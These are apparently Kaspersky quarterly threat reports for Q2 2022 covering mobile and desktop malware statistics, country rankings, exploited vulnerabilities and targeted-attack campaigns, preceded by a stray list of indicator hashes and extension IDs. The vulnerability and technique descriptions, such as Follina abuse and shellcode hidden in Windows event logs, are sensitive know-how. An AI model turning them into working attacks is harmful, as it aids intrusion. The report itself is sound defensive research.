nahhmpbckpgdidfnmfkfgiflpjijilce
pilplloabdedfmialnfchjomjmpjcoej

AddScript extension MD5
28a18438e85aacad71423b044d0f9e3c

AddScript extension ID
hdbipekpdpggjaipompnomhccfemaljm
lfedlgnabjompjngkpddclhgcmeklana
aonedlchkbicmhepimiahfalheedjgbh
oobppndjaabcidladjeehddkgkccfcpn

NullMixer MD5
F94BF1734F34665A65A835CC04A4AD95

FBStealer extension installer MD5
5010c3b42d269cb06e5598a5b1b143a5

FBStealer extension ID
colgdlijdieibnaccfdcdbpdffofkfeb
fdempkefdmgfcogieifmnadjhohaljcb

2022. augusztus 15.

IT threat evolution in Q2 2022. Mobile statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q2 2022:

  • 5,520,908 mobile malware, adware and riskware attacks were blocked.
  • The most common threat to mobile devices was adware: 25.28% of all threats detected.
  • 405,684 malicious installation packages were detected, of which:
    • 55,614 packages were related to mobile banking Trojans;
    • 3,821 packages were mobile ransomware Trojans.
Quarterly highlights

In the second quarter of 2022, cybercriminal activity continued to decline — if the number of attacks on mobile devices is any indication.

Number of attacks targeting users of Kaspersky mobile solutions, Q1 2020 — Q2 2022 (download)

As in the previous quarter, fraudulent apps occupied seven out of twenty leading positions in the malware rankings. That said, the total number of attacks by these apps started to decrease.

Interestingly enough, some fraudulent app creators were targeting users from several countries at once. For instance, J-Lightning Application purported to help users to invest into a Polish oil refinery, a Russian energy company, a Chinese cryptocurrency exchange and an American investment fund.

On the contrary, the number of attacks by the RiskTool.AndroidOS.SpyLoan riskware family (loan apps that request access to users’ text messages, contact list and photos) more than quadrupled from the first quarter. The majority of users whose devices were found to be infected with this riskware were based in Mexico: a third of the total number of those attacked. This was followed by India and Colombia. The ten most-affected countries include Kenya, Brazil, Peru, Pakistan, Nigeria, Uganda and the Philippines.

The second quarter was also noteworthy for Europol taking down the infrastructure of the FluBot mobile botnet, also known as Polph and Cabassous. This aggressively spreading banking Trojan attacked mainly users in Europe and Australia.

Mobile threat statistics

In Q2 2022, Kaspersky detected 405,684 malicious installation packages, a reduction of 110,933 from the previous quarter and a year-on-year decline of 480,421.

Number of detected malicious installation packages, Q2 2021 — Q2 2022 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q1 and Q2 2022 (download)

Adware ranked first among all threats detected in Q2 2022 with 25.28%, exceeding the previous quarter’s figure by 8.36 percentage points. A third of all detected threats of that class were objects of the AdWare.AndroidOS.Ewind family (33.21%). This was followed by the AdWare.AndroidOS.Adlo (22.54%) and AdWare.AndroidOS.HiddenAd (8.88%) families.

The previous leader, the RiskTool riskware, moved to second place with 20.81% of all detected threats, a decline of 27.94 p.p. from the previous quarter. More than half (60.16%) of the discovered apps of that type belonged to the Robtes family.

Various Trojans came close behind with 20.49%, a rise of 5.81 p.p. on the previous quarter. The largest contribution was made by objects belonging to the Mobtes (38.75%), Boogr (21.12%) and Agent (18.98%) families.

Top 20 mobile malware programs

Note that the malware rankings below exclude riskware or PUAs, such as RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 21.90 2 Trojan-SMS.AndroidOS.Fakeapp.d 10.71 3 Trojan.AndroidOS.Generic 10.55 4 Trojan.AndroidOS.GriftHorse.ah 6.07 5 Trojan-Spy.AndroidOS.Agent.aas 5.40 6 Trojan.AndroidOS.GriftHorse.l 3.43 7 DangerousObject.AndroidOS.GenericML 3.21 8 Trojan-Dropper.AndroidOS.Agent.sl 2.82 9 Trojan.AndroidOS.Fakemoney.d 2.33 10 Trojan.AndroidOS.Fakeapp.ed 1.82 11 Trojan.AndroidOS.Fakeapp.dw 1.68 12 Trojan.AndroidOS.Fakemoney.i 1.62 13 Trojan.AndroidOS.Soceng.f 1.59 14 Trojan-Ransom.AndroidOS.Pigetrl.a 1.59 15 Trojan.AndroidOS.Boogr.gsh 1.56 16 Trojan-Downloader.AndroidOS.Necro.d 1.56 17 Trojan-SMS.AndroidOS.Agent.ado 1.54 18 Trojan-Dropper.AndroidOS.Hqwar.gen 1.54 19 Trojan.AndroidOS.Fakemoney.n 1.52 20 Trojan-Downloader.AndroidOS.Agent.kx 1.45

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

First and third places went to DangerousObject.Multi.Generic (21.90%) and Trojan.AndroidOS.Generic (10.55%), respectively, which are verdicts we use for malware detected with cloud technology. Cloud technology is triggered whenever the antivirus databases lack data for detecting a piece of malware, but the antivirus company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

Trojan-SMS.AndroidOS.Fakeapp.d rose from third to second place with 10.71%. This malware is capable of sending text messages and calling predefined numbers, displaying ads and hiding its icon.

Members of the Trojan.AndroidOS.GriftHorse family took fourth and sixth places with 6.07% and 3.43%, respectively. This family includes fraudulent apps that purchase paid subscriptions on the user’s behalf.

Trojan-Spy.AndroidOS.Agent.aas (5.40%), an evil twin of WhatsApp with a spy module built in, retained fifth position.

The verdict of DangerousObject.AndroidOS.GenericML (3.21%) came seventh. These verdicts are assigned to files recognized as malicious by our machine-learning systems.

Trojan-Dropper.AndroidOS.Agent.sl (2.82%), a dropper that unpacks and runs a banking Trojan on devices, remained in eighth place. Most of the attacked users were based in Russia or Germany.

Trojan.AndroidOS.Fakemoney.d slid from second to ninth place with 2.33%. Other members of the family occupied twelfth and nineteenth places in the rankings. These are fraudulent apps that offer users to fill out fake welfare applications.

Trojan.AndroidOS.Fakeapp.ed dropped to tenth place from sixth with 1.82%; this verdict covers fraudulent apps purporting to help with investing in gas utilities and mostly targeting Russian users.

Trojan.AndroidOS.Fakeapp.dw dropped from tenth place to eleventh with 1.68%. This verdict is assigned to various scammer apps, for example, those offering to make extra income.

Trojan.AndroidOS.Soceng.f (1.59%) dropped from twelfth to thirteenth place. This Trojan sends text messages to people in your contacts list, deletes files on the user’s SD card, and overlays the interfaces of popular apps with its own window.

Trojan-Ransom.AndroidOS.Pigetrl.a dropped from eleventh to fourteenth place with 1.59%. This malware locks the screen, asking to enter an unlock code. The Trojan provides no instructions on how to obtain this code, which is embedded in the body of the malware.

The verdict of Trojan.AndroidOS.Boogr.gsh occupied fifteenth place with 1.56%. Like DangerousObject.AndroidOS.GenericML, this verdict is produced by a machine learning system.

Trojan-Downloader.AndroidOS.Necro.d (1.56%), designed for downloading and running other malware on infected devices, climbed to sixteenth place from seventeenth.

Trojan-SMS.AndroidOS.Agent.ado dropped from fifteenth to seventeenth place with 1.54%. This malware sends text messages to short codes.

Trojan-Dropper.AndroidOS.Hqwar.gen, which unpacks and runs various banking Trojans on a device, kept eighteenth place with 1.54%.

Trojan-Downloader.AndroidOS.Agent.kx (1.45%), which loads adware, dropped to the bottom of the rankings.

Geography of mobile threats

Map of attempts to infect mobiles with malware, Q2 2022 (download)

TOP 10 countries and territories by share of users attacked by mobile malware

Countries and territories* %** 1 Iran 26,91 2 Yemen 17,97 3 Saudi Arabia 12,63 4 Oman 12,01 5 Algeria 11,49 6 Egypt 10,48 7 Morocco 7,88 8 Kenya 7,58 9 Ecuador 7,19 10 Indonesia 6,91

* Excluded from the rankings are countries and territories with relatively few (under 10,000) Kaspersky mobile security users.
** Unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

Iran remained the leader in terms of the share of infected devices in Q2 2022 with 26.91%; the most widespread threats there as before were the annoying AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben families. Yemen rose to second place with 17.97%; the Trojan-Spy.AndroidOS.Agent.aas spyware was the threat most often encountered by users in that country. Saudi Arabia came third with 12.63%, the most common malware apps in the country being the AdWare.AndroidOS.Adlo and AdWare.AndroidOS.Fyben adware families.

Mobile banking Trojans

The number of detected mobile banking Trojan installation packages increased slightly compared to the previous quarter: during the reporting period, we found 55,614 of these, an increase of 1,667 on Q1 2022 and a year-on-year increase of 31,010.

Almost half (49.28%) of the detected installation packages belonged to the Trojan-Banker.AndroidOS.Bray family. The Trojan-Banker.AndroidOS.Wroba was second with 5.54%, and Trojan-Banker.AndroidOS.Fakecalls third with 4.83%.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2021 — Q2 2022 (download)

Ten most common mobile bankers

Verdict %* 1 Trojan-Banker.AndroidOS.Bian.h 23.22 2 Trojan-Banker.AndroidOS.Anubis.t 10.48 3 Trojan-Banker.AndroidOS.Svpeng.q 7.88 4 Trojan-Banker.AndroidOS.Asacub.ce 4.48 5 Trojan-Banker.AndroidOS.Sova.g 4.32 6 Trojan-Banker.AndroidOS.Gustuff.d 4.04 7 Trojan-Banker.AndroidOS.Ermak.a 4.00 8 Trojan-Banker.AndroidOS.Agent.ep 3.66 9 Trojan-Banker.AndroidOS.Agent.eq 3.58 10 Trojan-Banker.AndroidOS.Faketoken.z 2.51

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Geography of mobile banking threats, Q2 2022 (download)

TOP 10 countries and territories by shares of users attacked by mobile banking Trojans

Countries and territories* %** 1 Spain 1.04 2 Turkey 0.71 3 Australia 0.67 4 Saudi Arabia 0.64 5 Switzerland 0.38 6 UAE 0.23 7 Japan 0.14 8 Colombia 0.14 9 Italy 0.10 10 Portugal 0.09

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 10,000) have been excluded from the ranking.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

In Q2 2022, Spain still had the largest share of unique users attacked by mobile financial threats: 1.04%. Trojan-Banker.AndroidOS.Bian.h accounted for 89.95% of attacks on Spanish users. Turkey had the second-largest share (0.71%), with attacks on Turkish users dominated by Trojan-Banker.AndroidOS.Ermak.a (41.38%). Australia was third with 0.67%; most attacks in this country were attributed to Trojan-Banker.AndroidOS.Gustuff.d (96,55%).

Mobile ransomware Trojans

The number of mobile ransomware Trojan installation packages we detected in Q2 2022 (3,821) almost doubled from Q1 2022, increasing by 1,879; the figure represented a year-on-year increase of 198.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q2 2021 — Q2 2022 (download)

Top 10 most common mobile ransomware

Verdict %* 1 Trojan-Ransom.AndroidOS.Pigetrl.a 76.81 2 Trojan-Ransom.AndroidOS.Rkor.ch 2.66 3 Trojan-Ransom.AndroidOS.Small.as 2.51 4 Trojan-Ransom.AndroidOS.Rkor.br 1.46 5 Trojan-Ransom.AndroidOS.Rkor.bi 1.40 6 Trojan-Ransom.AndroidOS.Svpeng.ah 1.29 7 Trojan-Ransom.AndroidOS.Congur.cw 1.23 8 Trojan-Ransom.AndroidOS.Small.cj 1.14 9 Trojan-Ransom.AndroidOS.Svpeng.ac 1.14 10 Trojan-Ransom.AndroidOS.Congur.bf 1.07

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

Geography of mobile ransomware Trojans, Q2 2022 (download)

TOP 10 countries and territories by share of users attacked by mobile ransomware Trojans

Countries and territories* %** 1 Yemen 0,30 2 Kazakhstan 0,19 3 Azerbaijan 0,06 4 Kyrgyzstan 0,04 5 Switzerland 0,04 6 Egypt 0,03 7 Saudi Arabia 0,03 8 Uzbekistan 0,02 9 Russian Federation 0,02 10 Morocco 0,02

* Excluded from the rankings are countries and territories with relatively few (under 10,000) Kaspersky mobile security users.
** Unique users attacked by ransomware Trojans as a percentage of all Kaspersky mobile security solution users in the country or territory.

Countries leading by number of users attacked by mobile ransomware Trojans were Yemen (0.30%), Kazakhstan (0.19%) and Azerbaijan (0.06%). Users in Yemen most often encountered Trojan-Ransom.AndroidOS.Pigetrl.a, while users in Kazakhstan and Azerbaijan were attacked mainly by members of the Trojan-Ransom.AndroidOS.Rkor family.

2022. augusztus 15.

IT threat evolution in Q2 2022. Non-mobile statistics

These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q2 2022:

  • Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
  • Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 100,829 unique users.
  • Ransomware attacks were defeated on the computers of 74,377 unique users.
  • Our File Anti-Virus detected 55,314,176 unique malicious and potentially unwanted objects.
Financial threats Financial threat statistics

In Q2 2022, Kaspersky solutions blocked the launch of malware designed to steal money from bank accounts on the computers of 100,829 unique users.

Number of unique users attacked by financial malware, Q2 2022 (download)

Geography of financial malware attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory.

Geography of financial malware attacks, Q2 2022 (download)

TOP 10 countries and territories by share of attacked users

Country or territory* %** 1 Turkmenistan 4.8 2 Afghanistan 4.3 3 Tajikistan 3.8 4 Paraguay 3.1 5 China 2.4 6 Yemen 2.4 7 Uzbekistan 2.2 8 Sudan 2.1 9 Egypt 2.0 10 Mauritania 1.9

* Excluded are countries and territories with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

TOP 10 banking malware families

Name Verdicts %* 1 Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 35.5 2 Zbot/Zeus Trojan-Banker.Win32.Zbot 15.8 3 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 6.4 4 Trickster/Trickbot Trojan-Banker.Win32.Trickster 6 5 RTM Trojan-Banker.Win32.RTM 2.7 6 SpyEye Trojan-Spy.Win32.SpyEye 2.3 7 IcedID Trojan-Banker.Win32.IcedID 2.1 8 Danabot Trojan-Banker.Win32.Danabot 1.9 9 BitStealer Trojan-Banker.Win32.BitStealer 1.8 10 Gozi Trojan-Banker.Win32.Gozi 1.3

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Ransomware programs Quarterly trends and highlights

In the second quarter, the Lockbit group launched a bug bounty program. The cybercriminals are promising $1,000 to $1,000,000 for doxing of senior officials, reporting  web service, Tox messenger or ransomware Trojan algorithm vulnerabilities, as well as for ideas on improving the Lockbit website and Trojan. This was the first-ever case of ransomware groups doing a (self-promotion?) campaign like that.

Another well-known group, Conti, said it was shutting down operations. The announcement followed a high-profile attack on Costa Rica’s information systems, which prompted the government to declare a state of emergency. The Conti infrastructure was shut down in late June, but some in the infosec community believe that Conti members are either just rebranding or have split up and joined other ransomware teams, including Hive, AvosLocker and BlackCat.

While some ransomware groups are drifting into oblivion, others seem to be making a comeback. REvil’s website went back online in April, and researchers discovered a newly built specimen of their Trojan. This might have been a test build, as the sample did not encrypt any files, but these events may herald the impending return of REvil.

Kaspersky researchers found a way to recover files encrypted by the Yanluowang ransomware and released a decryptor for all victims. Yanluowang has been spotted in targeted attacks against large businesses in the US, Brazil, Turkey, and other countries.

Number of new modifications

In Q2 2022, we detected 15 new ransomware families and 2355 new modifications of this malware type.

Number of new ransomware modifications, Q2 2021 — Q2 2022 (download)

Number of users attacked by ransomware Trojans

In Q2 2022, Kaspersky products and technologies protected 74,377 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q2 2022 (download)

Geography of attacked users

Geography of attacks by ransomware Trojans, Q2 2022 (download)

TOP 10 countries and territories attacked by ransomware Trojans

Country or territory* %** 1 Bangladesh 1.81 2 Yemen 1.24 3 South Korea 1.11 4 Mozambique 0.82 5 Taiwan 0.70 6 China 0.46 7 Pakistan 0.40 8 Angola 0.37 9 Venezuela 0.33 10 Egypt 0.32

* Excluded are countries and territories with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country.

TOP 10 most common families of ransomware Trojans Name Verdicts* Percentage of attacked users** 1 Stop/Djvu Trojan-Ransom.Win32.Stop 17.91 2 WannaCry Trojan-Ransom.Win32.Wanna 12.58 3 Magniber Trojan-Ransom.Win64.Magni 9.80 4 (generic verdict) Trojan-Ransom.Win32.Gen 7.91 5 (generic verdict) Trojan-Ransom.Win32.Phny 6.75 6 (generic verdict) Trojan-Ransom.Win32.Encoder 6.55 7 (generic verdict) Trojan-Ransom.Win32.Crypren 3.51 8 (generic verdict) Trojan-Ransom.MSIL.Encoder 3.02 9 PolyRansom/VirLock Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom 2.96 10 (generic verdict) Trojan-Ransom.Win32.Instructions 2.69

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data.
** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans.

Miners Number of new miner modifications

In Q2 2022, Kaspersky solutions detected 40,788 new modifications of miners. A vast majority of these (more than 35,000) were detected in June. Thus, the spring depression — in March through May we found a total of no more than 10,000 new modifications — was followed by a record of sorts.

Number of new miner modifications, Q2 2022 (download)

Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 454,385 unique users of Kaspersky products and services worldwide. We are seeing a reverse trend here: miner attacks have gradually declined since the beginning of 2022.

Number of unique users attacked by miners, Q2 2022 (download)

Geography of miner attacks

Geography of miner attacks, Q2 2022 (download)

TOP 10 countries and territories attacked by miners

Country or territory* %** 1 Rwanda 2.94 2 Ethiopia 2.67 3 Tajikistan 2.35 4 Tanzania 1.98 5 Kyrgyzstan 1.94 6 Uzbekistan 1.88 7 Kazakhstan 1.84 8 Venezuela 1.80 9 Mozambique 1.68 10 Ukraine 1.56

* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by criminals during cyberattacks Quarterly highlights

During Q2 2022, a number of major vulnerabilities were discovered in the Microsoft Windows. For instance, CVE-2022-26809 critical error allows an attacker to remotely execute arbitrary code in a system using a custom RPC request. The Network File System (NFS) driver was found to contain two RCE vulnerabilities: CVE-2022-24491 and CVE-2022-24497. By sending a custom network message via the NFS protocol, an attacker can remotely execute arbitrary code in the system as well. Both vulnerabilities affect server systems with the NFS role activated. The CVE-2022-24521 vulnerability targeting the Common Log File System (CLFS) driver was found in the wild. It allows elevation of local user privileges, although that requires the attacker to have gained a foothold in the system. CVE-2022-26925, also known as LSA Spoofing, was another vulnerability found during live operation of server systems. It allows an unauthenticated attacker to call an LSARPC interface method and get authenticated by Windows domain controller via the NTLM protocol. These vulnerabilities are an enduring testament to the importance of timely OS and software updates.

Most of the network threats detected in Q2 2022 had been mentioned in previous reports. Most of those were attacks that involved brute-forcing  access to various web services. The most popular protocols and technologies susceptible to these attacks include MS SQL Server, RDP and SMB. Attacks that use the EternalBlue, EternalRomance and similar exploits are still popular. Exploitation of Log4j vulnerability (CVE-2021-44228) is also quite common, as the susceptible Java library is often used in web applications. Besides, the Spring MVC framework, used in many Java-based web applications, was found to contain a new vulnerability CVE-2022-22965 that exploits the data binding functionality and results in remote code execution. Finally, we have observed a rise in attacks that exploit insecure deserialization, which can also result in access to remote systems due to incorrect or missing validation of untrusted user data passed to various applications.

Vulnerability statistics

Exploits targeting Microsoft Office vulnerabilities grew in the second quarter to 82% of the total. Cybercriminals were spreading malicious documents that exploited CVE-2017-11882 and CVE-2018-0802, which are the best-known vulnerabilities in the Equation Editor component. Exploitation involves the component memory being damaged and a specially designed script, run on the target computer. Another vulnerability, CVE-2017-8570, allows downloading and running a malicious script when opening an infected document, to execute various operations in a vulnerable system. The emergence of CVE-2022-30190or Follina vulnerability also increased the number of exploits in this category. An attacker can use a custom malicious document with a link to an external OLE object, and a special URI scheme to have Windows run the MSDT diagnostics tool. This, in turn, combined with a special set of parameters passed to the victim’s computer, can cause an arbitrary command to be executed — even if macros are disabled and the document is opened in Protected Mode.

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2022 (download)

Attempts at exploiting vulnerabilities that affect various script engines and, specifically, browsers, dipped to 5%. In the second quarter, a number of critical RCE vulnerabilities were discovered in various Google Chrome based browsers: CVE-2022-0609, CVE-2022-1096, and CVE-2022-1364. The first one was found in the animation component; it exploits a Use-After-Free error, causing memory damage, which is followed by the attacker creating custom objects to execute arbitrary code. The second and third vulnerabilities are Type Confusion errors associated with the V8 script engine; they also can result in arbitrary code being executed on a vulnerable user system. Some of the vulnerabilities discovered were found to have been exploited in targeted attacks, in the wild. Mozilla Firefox was found to contain a high-risk Use-After-Free vulnerability, CVE-2022-1097, which appears when processing NSSToken-type objects from different streams. The browser was also found to contain CVE-2022-28281, a vulnerability that affects the WebAuthn extension. A compromised Firefox content process can write data out of bounds of the parent process memory, thus potentially enabling code execution with elevated privileges. Two further vulnerabilities, CVE-2022-1802 and CVE-2022-1529, were exploited in cybercriminal attacks. The exploitation method, dubbed “prototype pollution”, allows executing arbitrary JavaScript code in the context of a privileged parent browser process.

As in the previous quarter, Android exploits ranked third in our statistics with 4%, followed by exploits of Java applications, the Flash platform, and PDF documents, each with 3%.

Attacks on macOS

The second quarter brought with it a new batch of cross-platform discoveries. For instance, a new APT group Earth Berberoka (GamblingPuppet) that specializes in hacking online casinos, uses malware for Windows, Linux, and macOS. The TraderTraitor campaign targets cryptocurrency and blockchain organizations, attacking with malicious crypto applications for both Windows and macOS.

TOP 20 threats for macOS

Verdict %* 1 AdWare.OSX.Amc.e 25.61 2 AdWare.OSX.Agent.ai 12.08 3 AdWare.OSX.Pirrit.j 7.84 4 AdWare.OSX.Pirrit.ac 7.58 5 AdWare.OSX.Pirrit.o 6.48 6 Monitor.OSX.HistGrabber.b 5.27 7 AdWare.OSX.Agent.u 4.27 8 AdWare.OSX.Bnodlero.at 3.99 9 Trojan-Downloader.OSX.Shlayer.a 3.87 10 Downloader.OSX.Agent.k 3.67 11 AdWare.OSX.Pirrit.aa 3.35 12 AdWare.OSX.Pirrit.ae 3.24 13 Backdoor.OSX.Twenbc.e 3.16 14 AdWare.OSX.Bnodlero.ax 3.06 15 AdWare.OSX.Agent.q 2.73 16 Trojan-Downloader.OSX.Agent.h 2.52 17 AdWare.OSX.Bnodlero.bg 2.42 18 AdWare.OSX.Cimpli.m 2.41 19 AdWare.OSX.Pirrit.gen 2.08 20 AdWare.OSX.Agent.gen 2.01

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

As usual, the TOP 20 ranking for threats detected by Kaspersky security solutions for macOS users is dominated by various adware. AdWare.OSX.Amc.e, also known as Advanced Mac Cleaner, is a newcomer and already a leader, found with a quarter of all attacked users. Members of this family display fake system problem messages, offering to buy the full version to fix those. It was followed by members of the AdWare.OSX.Agent and AdWare.OSX.Pirrit families.

Geography of threats for macOS

Geography of threats for macOS, Q2 2022 (download)

TOP 10 countries and territories by share of attacked users

Country or territory* %** 1 France 2.93 2 Canada 2.57 3 Spain 2.51 4 United States 2.45 5 India 2.24 6 Italy 2.21 7 Russian Federation 2.13 8 United Kingdom 1.97 9 Mexico 1.83 10 Australia 1.82

* Excluded from the rating are countries and territories  with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In Q2 2022, the country where the most users were attacked was again France (2.93%), followed by Canada (2.57%) and Spain (2.51%). AdWare.OSX.Amc.e was the most common adware encountered in these three countries.

IoT attacks IoT threat statistics

In Q2 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol, as before.

Telnet 82,93% SSH 17,07%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2022

The statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.

Telnet 93,75% SSH 6,25%

Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2022

TOP 10 threats delivered to IoT devices via Telnet

Verdict %* 1 Backdoor.Linux.Mirai.b 36.28 2 Trojan-Downloader.Linux.NyaDrop.b 14.66 3 Backdoor.Linux.Mirai.ek 9.15 4 Backdoor.Linux.Mirai.ba 8.82 5 Trojan.Linux.Agent.gen 4.01 6 Trojan.Linux.Enemybot.a 2.96 7 Backdoor.Linux.Agent.bc 2.58 8 Trojan-Downloader.Shell.Agent.p 2.36 9 Trojan.Linux.Agent.mg 1.72 10 Backdoor.Linux.Mirai.cw 1.45

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT-threat statistics are published in the DDoS report for Q2 2022.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums.

TOP 10 countries and territories that serve as sources of web-based attacks

The following statistics show the distribution by country or territory  of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q2 2022, Kaspersky solutions blocked 1,164,544,060 attacks launched from online resources across the globe. A total of 273,033,368 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web-attack sources by country and territory, Q2 2022 (download)

Countries and territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users around the world, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

Note that these rankings only include attacks by malicious objects that fall under the Malware class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

Country or territory* %** 1 Taiwan 26.07 2 Hong Kong 14.60 3 Algeria 14.40 4 Nepal 14.00 5 Tunisia 13.55 6 Serbia 12.88 7 Sri Lanka 12.41 8 Albania 12.21 9 Bangladesh 11.98 10 Greece 11.86 11 Palestine 11.82 12 Qatar 11.50 13 Moldova 11.47 14 Yemen 11.44 15 Libya 11.34 16 Zimbabwe 11.15 17 Morocco 11.03 18 Estonia 11.01 19 Turkey 10.75 20 Mongolia 10.50

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

On average during the quarter, 8.31% of the Internet users’ computers worldwide were subjected to at least one Malware-class web attack.

Geography of web-based malware attacks, Q2 2022 (download)

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q2 2022, our File Anti-Virus detected 55,314,176 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries and territories.

Note that these rankings only include attacks by malicious programs that fall under the Malware class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country or territory* %** 1 Turkmenistan 47.54 2 Tajikistan 44.91 3 Afghanistan 43.19 4 Yemen 43.12 5 Cuba 42.71 6 Ethiopia 41.08 7 Uzbekistan 37.91 8 Bangladesh 37.90 9 Myanmar 36.97 10 South Sudan 36.60 11 Syria 35.60 12 Burundi 34.88 13 Rwanda 33.69 14 Algeria 33.61 15 Benin 33.60 16 Tanzania 32.88 17 Malawi 32.65 18 Venezuela 31.79 19 Cameroon 31.34 20 Chad 30.92

*  Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q2 2022 (download)

On average worldwide, Malware-class local threats were registered on 14.65% of users’ computers at least once during Q2. Russia scored 16.66% in this rating.

2022. augusztus 15.

IT threat evolution Q2 2022

Targeted attacks New technique for installing fileless malware

Earlier this year, we discovered a malicious campaign that employed a new technique for installing fileless malware on target machines by injecting a shellcode directly into Windows event logs. The attackers were using this to hide a last-stage Trojan in the file system.

The attack starts by driving targets to a legitimate website and tricking them into downloading a compressed RAR file that is booby-trapped with the network penetration testing tools Cobalt Strike and SilentBreak. The attackers use these tools to inject code into any process of their choosing. They inject the malware directly into the system memory, leaving no artifacts on the local drive that might alert traditional signature-based security and forensics tools. While fileless malware is nothing new, the way the encrypted shellcode containing the malicious payload is embedded into Windows event logs is.

The code is unique, with no similarities to known malware, so it is unclear who is behind the attack.

WinDealer’s man-on-the-side spyware

We recently published our analysis of WinDealer: malware developed by the LuoYu APT threat actor. One of the most interesting aspects of this campaign is the group’s use of a man-on-the-side attack to deliver malware and control compromised computers. A man-on-the-side attack implies that the attacker is able to control the communication channel, allowing them to read the traffic and inject arbitrary messages into normal data exchange. In the case of WinDealer, the attackers intercepted an update request from completely legitimate software and swapped the update file with a weaponized one.

The malware does not contain the exact address of the C2 (command-and-control) server, making it harder for security researchers to find it. Instead, it tries to access a random IP address from a predefined range. The attackers then intercept the request and respond to it. To do this, they need constant access to the routers of the entire subnet, or to some advanced tools at ISP level.

The vast majority of WinDealer’s targets are located in China: foreign diplomatic organizations, members of the academic community, or companies active in the defense, logistics or telecoms sectors. Sometimes, though, the LuoYu APT group will infect targets in other countries: Austria, the Czech Republic, Germany, India, Russia and the US. In recent months, they have also become more interested in businesses located in other East Asian countries and their China-based offices.

ToddyCat: previously unknown threat actor attacks high-profile organizations in Europe and Asia

In June, we published our analysis of ToddyCat, a relatively new APT threat actor that we have not been able to link to any other known actors. The first wave of attacks, against a limited number of servers in Taiwan and Vietnam, targeted Microsoft Exchange servers, which the threat actor compromised with Samurai, a sophisticated passive backdoor that typically works via ports 80 and 443. The malware allows arbitrary C# code execution and is used alongside multiple modules that let the attacker administer the remote system and move laterally within the targeted network. In certain cases, the attackers have used the Samurai backdoor to launch another sophisticated malicious program, which we dubbed Ninja. This is probably a component of an unknown post-exploitation toolkit exclusively used by ToddyCat.

